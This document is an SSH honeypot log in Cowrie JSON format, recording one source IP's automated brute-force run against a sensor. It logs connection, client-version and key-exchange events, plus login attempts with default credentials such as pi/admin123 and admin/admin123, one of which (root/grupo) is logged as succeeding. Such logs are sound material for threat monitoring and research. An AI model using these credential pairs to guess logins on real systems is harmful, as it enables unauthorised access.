{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.357533Z","src_ip":"212.227.125.160","session":"0dded56bb8b0"}
{"eventid":"cowrie.login.success","username":"root","password":"grupo","message":"login attempt [root/grupo] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.423927Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.login.failed","username":"noc","password":"p@ssw0rd","message":"login attempt [noc/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.496176Z","src_ip":"212.227.125.160","session":"0dded56bb8b0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.655899Z","src_ip":"212.227.125.160","session":"f05addc0c810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52912,"dst_ip":"1.2.3.4","dst_port":22,"session":"89bf7882bc9b","protocol":"ssh","message":"New connection: 212.227.125.160:52912 (1.2.3.4:22) [session: 89bf7882bc9b]","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.717351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.765110Z","src_ip":"212.227.125.160","session":"89bf7882bc9b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.766220Z","src_ip":"212.227.125.160","session":"89bf7882bc9b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.774565Z","src_ip":"212.227.125.160","session":"49cbef1e9e8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52916,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c9342ba97ae","protocol":"ssh","message":"New connection: 212.227.125.160:52916 (1.2.3.4:22) [session: 3c9342ba97ae]","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.838401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.891020Z","src_ip":"212.227.125.160","session":"3c9342ba97ae"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.891927Z","src_ip":"212.227.125.160","session":"3c9342ba97ae"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.905496Z","src_ip":"212.227.125.160","session":"7c748091dc05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52926,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0ef449eda4c","protocol":"ssh","message":"New connection: 212.227.125.160:52926 (1.2.3.4:22) [session: b0ef449eda4c]","sensor":"my-vps","timestamp":"2025-08-31T07:06:55.999792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.039736Z","src_ip":"212.227.125.160","session":"b0ef449eda4c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.067088Z","src_ip":"212.227.125.160","session":"b0ef449eda4c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"p@ssw0rd","message":"login attempt [pi/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.100043Z","src_ip":"212.227.125.160","session":"89bf7882bc9b"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin123","message":"login attempt [student/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.188847Z","src_ip":"212.227.125.160","session":"3c9342ba97ae"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.215798Z","src_ip":"212.227.125.160","session":"85ad9befb0bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52942,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ccd259500b0","protocol":"ssh","message":"New connection: 212.227.125.160:52942 (1.2.3.4:22) [session: 6ccd259500b0]","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.262576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.291186Z","src_ip":"212.227.125.160","session":"6ccd259500b0"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.301035Z","src_ip":"212.227.125.160","session":"b0ef449eda4c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.328135Z","src_ip":"212.227.125.160","session":"6ccd259500b0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.410515Z","src_ip":"212.227.125.160","session":"ca53739348e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52956,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a0866f079e","protocol":"ssh","message":"New connection: 212.227.125.160:52956 (1.2.3.4:22) [session: 76a0866f079e]","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.465514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.481619Z","src_ip":"212.227.125.160","session":"76a0866f079e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.542576Z","src_ip":"212.227.125.160","session":"76a0866f079e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.556288Z","src_ip":"212.227.125.160","session":"6ccd259500b0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.562335Z","src_ip":"212.227.125.160","session":"0dded56bb8b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52962,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c15d77b5cee","protocol":"ssh","message":"New connection: 212.227.125.160:52962 (1.2.3.4:22) [session: 1c15d77b5cee]","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.613209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.653136Z","src_ip":"212.227.125.160","session":"1c15d77b5cee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.672701Z","src_ip":"212.227.125.160","session":"1c15d77b5cee"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.750230Z","src_ip":"212.227.125.160","session":"76a0866f079e"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin123","message":"login attempt [noc/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:56.936487Z","src_ip":"212.227.125.160","session":"1c15d77b5cee"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.172352Z","src_ip":"212.227.125.160","session":"89bf7882bc9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53034,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeb757b8e4f1","protocol":"ssh","message":"New connection: 212.227.125.160:53034 (1.2.3.4:22) [session: aeb757b8e4f1]","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.227097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.248553Z","src_ip":"212.227.125.160","session":"aeb757b8e4f1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.270101Z","src_ip":"212.227.125.160","session":"3c9342ba97ae"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.307959Z","src_ip":"212.227.125.160","session":"aeb757b8e4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53068,"dst_ip":"1.2.3.4","dst_port":22,"session":"a73a943e54d5","protocol":"ssh","message":"New connection: 212.227.125.160:53068 (1.2.3.4:22) [session: a73a943e54d5]","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.322966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.363591Z","src_ip":"212.227.125.160","session":"a73a943e54d5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.371920Z","src_ip":"212.227.125.160","session":"b0ef449eda4c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.393656Z","src_ip":"212.227.125.160","session":"a73a943e54d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53074,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b1073578e24","protocol":"ssh","message":"New connection: 212.227.125.160:53074 (1.2.3.4:22) [session: 6b1073578e24]","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.444416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.483823Z","src_ip":"212.227.125.160","session":"6b1073578e24"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.544586Z","src_ip":"212.227.125.160","session":"6b1073578e24"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin123","message":"login attempt [pi/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.546169Z","src_ip":"212.227.125.160","session":"aeb757b8e4f1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.639996Z","src_ip":"212.227.125.160","session":"6ccd259500b0"}
{"eventid":"cowrie.login.failed","username":"student","password":"1234567890","message":"login attempt [student/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.642091Z","src_ip":"212.227.125.160","session":"a73a943e54d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53084,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d856c52f27d","protocol":"ssh","message":"New connection: 212.227.125.160:53084 (1.2.3.4:22) [session: 3d856c52f27d]","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.714910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.739385Z","src_ip":"212.227.125.160","session":"3d856c52f27d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.776383Z","src_ip":"212.227.125.160","session":"6b1073578e24"}
